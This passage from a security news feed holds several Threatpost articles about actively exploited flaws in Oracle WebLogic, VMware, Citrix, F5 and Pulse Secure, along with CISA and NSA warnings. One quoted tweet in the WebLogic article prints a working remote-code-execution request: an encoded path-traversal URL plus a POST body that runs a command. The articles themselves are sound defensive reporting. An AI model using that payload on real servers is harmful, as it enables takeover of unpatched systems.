Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-29T22:18:34", "description": "If an organization hasn\u2019t updated their Oracle WebLogic servers to protect them against a recently disclosed RCE flaw, researchers have a dire warning: \u201cAssume it has been compromised.\u201d\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The console component of the WebLogic Server has a flaw, CVE-2020-14882, which ranks 9.8 out of 10 on the CVSS scale. According to Oracle, the attack is \u201clow\u201d in complexity, requires no privileges and no user interaction and can be exploited by attackers with network access via HTTP.\n\nThe flaw was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe October update was released Oct. 21. Fast forward to this week, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said on Thursday that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\n\u201cAt this point, we are seeing the scans slow down a bit,\u201d said Ullrich [in a Thursday post](<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/>). \u201cBut they have reached \u2018saturation\u2019 meaning that all IPv4 addresses have been scanned for this vulnerability. If you find a vulnerable server in your network: Assume it has been compromised.\u201d\n\nUllrich said, the exploits appear to be based on a Wednesday blog post published (in Vietnamese) by \u201cJang,\u201d who described how to leverage the flaw to achieve remote code execution via only one GET request. Below is a proof of concept (POC) video.\n\nUllrich said, exploit attempts on the honeypots so far originate from four IP addresses: 114.243.211.182, 139.162.33.228, 185.225.19.240 and 84.17.37.239.\n\nUllrich[ and others](<https://twitter.com/GossiTheDog/status/1321430443611328513>) are urging Oracle WebLogic Server users to update their systems as soon as possible. Users can find a patch availability document for WebLogic and other vulnerable Oracle products, [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).\n\n> One for detection peeps. This Oracle WebLogic bug will get abused, pre-auth RCE via a POST request. <https://t.co/y6huXWUuS0>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [October 28, 2020](<https://twitter.com/GossiTheDog/status/1321430443611328513?ref_src=twsrc%5Etfw>)\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2020, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T14:49:58", "type": "threatpost", "title": "Oracle WebLogic Server RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14882"], "modified": "2020-10-29T14:49:58", "id": "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "href": "https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-25T02:52:39", "description": "[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nVMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems.\n\nPositive Technologies researcher Mikhail Klyuchnikov discovered two of the flaws in vCenter Server, the centralized management and automation platform for VMware\u2019s vSphere virtualization platform, which\u2014given VMware\u2019s dominant position in the market\u2014is used by the majority of enterprise data centers. Among its duties, vCenter Server manages virtual machines, multiple ESXi hypervisor hosts and other various dependent components from a central management dashboard.\n\n## **Where the VMware Flaws Were Found, What\u2019s Effected? **\n\nThe researcher found the most critical of the flaws, which is being tracked as [CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>) and has a CVSS v3 score of 9.8, in a vCenter Server plugin for vROPs in the vSphere Client functionality, according to [an advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) posted online Tuesday by VMware.\n\n\u201cA malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\u201d the company said.\n\nThe plugin is available in all default installations\u2014potentially giving attackers a wide attack surface\u2013and vROPs need not be present to have this endpoint available, according to VMware.\n\nThe main threat in terms of exploiting the vulnerability comes from insiders who have penetrated the protection of the network perimeter using other methods\u2013such as social engineering or web vulnerabilities\u2013or have access to the internal network using previously installed backdoors, according to Positive Technologies.\n\nKlyuchnikov said the VMware flaw poses \u201cno less threat\u201d than a notoriously easy-to-exploit[ Citrix RCE vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>), [CVE-2019-19781](<https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiOm6_Z4rnuAhWwlosKHTPHARo4ChAWMAJ6BAgLEAI&url=https://www.forbes.com/sites/daveywinder/2020/01/25/critical-security-warning-as-shitrix-hackers-ramp-up-critical-citrix-vulnerability-cve201919781-attacks/&usg=AOvVaw2MEaqcCGRpYlOcxC-Bey_j>), which was discovered two years ago affecting more than 25,000 servers globally. It is especially dangerous because \u201cit can be used by any unauthorized user,\u201d he said.\n\n\u201cThe error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server,\u201d Klyuchnikov explained. \u201cAfter receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system, such as information about virtual machines and system users.\u201d\n\n## How is CVE-2021-21972 Exploited?\n\nIn the case in which vulnerable software can be accessed from the internet, an external attacker can break into a company\u2019s external perimeter and also gain access to sensitive data, he added. This scenario is highly likely based on previous pentests executed by Positive Technologies, which allowed researchers to breach the network perimeter and gain access to local network resources in 93 percent of companies, according to the company.\n\nAnother flaw patched by VMware in the update also has potential for remote code execution and affects the hypervisor [VMware ESXi](<https://threatpost.com/vmware-critical-flaw-esxi-hypervisor/161457/>) , the company said. [CVE-2021-21974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974>), with a CVSSv3 base score of 8.9. is a heap-overflow vulnerability in the OpenSLP component as used in an ESXi host.\n\nA threat actor who\u2019s already inside the same network segment as an ESXi host and has access to port 427 can use the vulnerability to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution, according to VMware.\n\nThe other flaw Klyuchnikov discovered\u2014tracked as [CVE-2021-21973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21973>) and the least serious of the three\u2013is a Server Side Request Forgery (SSRF) vulnerability due to improper validation of URLs in a vCenter Server plugin with a CVSS score of 5.3, according to VMWare. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure,\u201d the company said.\n\nUnauthorized users can use the flaw to send requests as the targeted server to help threat actors develop further attacks. Used in combination with the other vulnerabilities, attackers could leverage it to scan the company\u2019s internal network and obtain information about the open ports of various services, Klyuchnikov said.\n\n## What VMware is Recommending for a Fix to the Data Center Bugs?\n\nVMware advised customers to install all updates provided to affected deployments to remediate the threat the vulnerabilities pose. The company also provided workarounds for those who can\u2019t immediately update their systems.\n\nPositive Technologies also recommended that companies affected who have vCenter Server interfaces on the perimeter of their organizations remove them, and also allocate the interfaces to a separate VLAN with a limited access list in the internal network, the company said.\n\n**_Is your small- to medium-sized business an easy mark for attackers?_**\n\n**Threatpost WEBINAR:** _ Save your spot for \u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this **LIVE **webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-24T17:14:55", "type": "threatpost", "title": "VMWare Patches Critical RCE Flaw in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T17:14:55", "id": "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "href": "https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-03T14:35:34", "description": "Oracle has released a rare out-of-band patch for a remote code-execution flaw in several versions of its WebLogic server.\n\nThe vulnerability ([CVE-2020-14750](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMW>)) has a CVSS base score of 9.8 out of 10, and is remotely exploitable without authentication (meaning it may be exploited over a network without the need for a username and password).\n\n\u201cDue to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible after they have applied the October 2020 Critical Patch Update,\u201d according to Eric Maurice, director of security assurance at Oracle, [in a Sunday advisory](<https://blogs.oracle.com/security/security-alert-cve-2020-14750-released>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile specific details of the flaw were not disclosed, Oracle\u2019s alert said it exists in the Console of the Oracle WebLogic Server and can be exploited via the HTTP network protocol. A potential attack has \u201clow\u201d complexity and no user interaction is required, said Oracle.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Affected versions of WebLogic Server include 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n> Oracle released an out-of-band security alert to address a vulnerability\u2014CVE-2020-14750\u2014in Oracle WebLogic Server. Patch ASAP! <https://t.co/34wm2YYgnx> [#Cyber](<https://twitter.com/hashtag/Cyber?src=hash&ref_src=twsrc%5Etfw>) [#Cybersecurity](<https://twitter.com/hashtag/Cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#InfoSec](<https://twitter.com/hashtag/InfoSec?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 US-CERT (@USCERT_gov) [November 2, 2020](<https://twitter.com/USCERT_gov/status/1323343180218195969?ref_src=twsrc%5Etfw>)\n\nOracle said that the vulnerability \u201cis related to\u201d CVE-2020-14882, which is also a remote code-execution flaw in WebLogic Servers. CVE-2020-14882 was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\nSecurity experts on Twitter [have pointed to](<https://twitter.com/breditor/status/1323435478218022913>) the fact that the fix for CVE-2020-14882 could be bypassed by merely changing the case of a character in their request. This would thus sidestep the path-traversal blacklist that was implemented to block the flaw, bypassing the patch.\n\n> [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2020\u201314882 Weblogic Unauthorized bypass RCE \nhttp://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal\n> \n> POST:\n> \n> _nfpb=true&_pageLabel=&handle=<https://t.co/jBUfUasQC1>.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)<https://t.co/nU8xkK30DU> [pic.twitter.com/uLiggjHnQG](<https://t.co/uLiggjHnQG>)\n> \n> \u2014 Jas502n (@jas502n) [October 28, 2020](<https://twitter.com/jas502n/status/1321416053050667009?ref_src=twsrc%5Etfw>)\n\nUpon further analysis of the bypass, \u201cThe web application is making an authorization decision based on the requested path but it is doing so without first fully decoding and canonicalizing the path,\u201d said Craig Young, security researcher with Tripwire, [in an analysis](<https://www.tripwire.com/state-of-security/vert/actively-exploited-weblogic-vulnerability/>). \u201cThe result is that a URL can be constructed to match the pattern for a permitted resource but ultimately access a completely different resource.\u201d\n\n[While the patch for CVE-2020-14882 was released](<https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/>) during an Oct. 21 update, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said last week that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\nOracle WebLogic servers continue to be hard-hit with exploits. In May, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the [REvil/Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code-execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-03T13:57:26", "type": "threatpost", "title": "Oracle Rushes Emergency Fix for Critical WebLogic Server Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-11-03T13:57:26", "id": "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "href": "https://threatpost.com/oracle-update-weblogic-server-flaw/160889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-07T23:04:42", "description": "Active attacks against a flaw in VMware\u2019s Workspace One Access continue, [three days after](<https://threatpost.com/vmware-fix-critical-zero-day-bug/161896/>) the vendor patched the vulnerability and urged customers to fix the bug (classified as a zero-day at the time). Now the U.S. National Security Agency (NSA) has escalated concerns and on Monday warned that foreign adversaries have zeroed in on exploiting \u2013 specifically VMware\u2019s Workspace One Access and its Identity Manager products.\n\nThose VMware products are two of 12 impacted by a command-injection vulnerability, tracked as [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>), and [patched on Friday](<https://threatpost.com/vmware-fix-critical-zero-day-bug/161896/>). At the time, VMware said there were no reports of exploitation in the wild.\n\nAccording to the NSA, Russian-state threat actors are now leveraging the vulnerability to launch attacks to pilfer protected data and abuse shared authentication systems. \n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe exploitation(s), via command injection, led to installation of a web shell and follow-on malicious activity where credentials in the form of SAML authentication assertions were generated and sent to Microsoft Active Directory Federation Services, which in turn granted the actors access to protected data,\u201d wrote the [NSA in its security bulletin](<https://media.defense.gov/2020/Dec/07/2002547071/-1/-1/0/CSA_VMWARE%20ACCESS_U_OO_195076_20.PDF>) (PDF).\n\nSAML stands for Security Assertion Markup Language, which is a standard used by organizations to exchange authentication and authorization data. SAML is used primarily as a means of enabling single sign-on between web domains.\n\n\u201cIt is critical when running products that perform authentication that the server and all the services that depend on it are properly configured for secure operation and integration,\u201d the NSA wrote. \u201cOtherwise, SAML assertions could be forged, granting access to numerous resources. If integrating authentication servers with ADFS, NSA recommends following Microsoft\u2019s best practices, especially for securing SAML assertions and requiring multi-factor authentication.\u201d\n\nVMware originally disclosed the vulnerability [in late November](<https://threatpost.com/vmware-zero-day-patch-pending/161523/>) \u2013 identifying it as an escalation-of-privileges flaw that impacts Workspace One Access and other platforms, for both Windows and Linux operating systems. A total of 12 product versions are impacted the flaw.\n\nOn Friday, VMware urged customers to [update affected systems to the latest version](<https://kb.vmware.com/s/article/81754>) as soon as possible to mitigate the issue. On Monday, the NSA urged IT security teams to review and harden configurations and monitoring of federated authentication providers. Details regarding a number of workaround mitigations are [described by the NSA](<https://media.defense.gov/2020/Dec/07/2002547071/-1/-1/0/CSA_VMWARE%20ACCESS_U_OO_195076_20.PDF>) (PDF) and VMware.\n\n\u201cA malicious actor with network access to the administrative configurator on port 8443 and a valid password for the configurator admin account can execute commands with unrestricted privileges on the underlying operating system,\u201d VMware wrote in an [updated advisory](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>) last week.\n\nAt the time VMware revised the CVSS severity rating for the bug from \u201ccritical\u201d to \u201cimportant.\u201d It explained, an attacker would need prior-knowledge of a password associated with the use of one of the products to exploit the vulnerability.\n\nThe password would [need to be obtained](<https://attack.mitre.org/techniques/T1586/>) via tactics such as phishing or brute forcing/credential stuffing, it wrote.\n\nThe Department of Homeland Security\u2019s [US-CERT](<https://www.kb.cert.org/vuls/id/724367>), on Monday, also updated an existing security bulletin regarding the bug. However, the agency did not attribute the attacks to any specific group.\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _**[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ on Dec. 16 at 2 p.m. ET. Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from John (Austin) Merritt, Cyber Threat Intelligence Analyst at Digital Shadows, and Israel Barak, CISO at Cybereason, on new kinds of attacks. Topics will include the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _**[**_Register here_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ for the Wed., Dec. 16 for this LIVE webinar._**\n", "cvss3": {}, "published": "2020-12-07T22:06:34", "type": "threatpost", "title": "NSA Warns: Patched VMware Bug Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-4006"], "modified": "2020-12-07T22:06:34", "id": "THREATPOST:710993CAB7FA720A00E40DD95C61087B", "href": "https://threatpost.com/nsa-vmware-bug-under-attack/161985/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-04T15:58:41", "description": "VMware has patched a zero-day bug that was disclosed in late November \u2013 an escalation-of-privileges flaw that impacts Workspace One and other platforms, for both Windows and Linux operating systems.\n\nVMware has also revised the CVSS severity rating for the bug to \u201cimportant,\u201d down from critical.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) had [originally flagged](<https://threatpost.com/vmware-zero-day-patch-pending/161523/>) the unpatched security vulnerability on Nov. 23, which affects 12 VMware versions across its Cloud Foundation, Identity Manager, vRealize Suite Lifecycle Manager and Workspace One portfolios. It was reported to the company by the National Security Agency (NSA).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nTracked as CVE-2020-4006, the bug allows command injection, according to the company\u2019s advisory.\n\n\u201cA malicious actor with network access to the administrative configurator on port 8443 and a valid password for the configurator admin account can execute commands with unrestricted privileges on the underlying operating system,\u201d VMware wrote in an [updated advisory](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>) on Thursday.\n\nWhile the bug was originally given a 9.1 out of 10 on the CVSS severity scale, further investigation showed that any attacker would need the password mentioned in the update, making it much harder to exploit effectively. Its rating is now 7.2, making it \u201cimportant\u201d rather than \u201ccritical.\u201d\n\n\u201cThis account is internal to the impacted products and a password is set at the time of deployment,\u201d according to the advisory. \u201cA malicious actor must possess this password to attempt to exploit CVE-2020-4006.\u201d\n\nThe password would [need to be obtained](<https://attack.mitre.org/techniques/T1586/>) via tactics like phishing or brute forcing/credential stuffing, it added.\n\nWhen the 